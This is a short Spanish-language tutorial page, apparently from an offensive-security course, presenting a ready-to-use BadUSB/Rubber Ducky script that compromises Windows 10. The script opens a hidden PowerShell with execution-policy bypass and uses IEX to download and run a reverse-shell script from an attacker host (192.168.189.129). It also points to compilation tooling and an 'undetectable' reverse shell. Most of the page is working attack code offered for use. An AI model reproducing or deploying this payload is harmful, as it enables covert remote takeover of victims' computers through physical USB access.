BadUSB

Para comprometer un equipo Windows utilizando un BadUSB podriamos utilizar el siguiente script:

REM Title: Reverse shell Via PowerShell
REM Author: Gerardo Eliasib
REM Description: Opens powershell and starts a reverse shell in hidden Powershell window
REM Target: Windows 10 (CMD, Powershell)
REM Version: 1.0
REM Category: Remote Access
DELAY 300
GUI r
DELAY 20
REM --> Utilizando IEX para realizar un GET por medio de la memoria comunicarse con nuestra ReverseShell.ps1
STRING powershell -w h -NoP -NonI -Ep Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.189.129/Invoke-Spartan.txt');
ENTER

Si estas utilizando una Rubber Ducky, se debe compilar utilizando la siguiente herramienta: https://payloadstudio.hak5.org/login/

Te recomendamos utilizar la siguiente Shell Inversa:

Reverse Shell en PowerShell Indetectable | CPAD-100

AnteriorIntroduccion a Flipper Zero SiguienteTu primer Red Team contra Active Directory

Última actualización hace 1 mes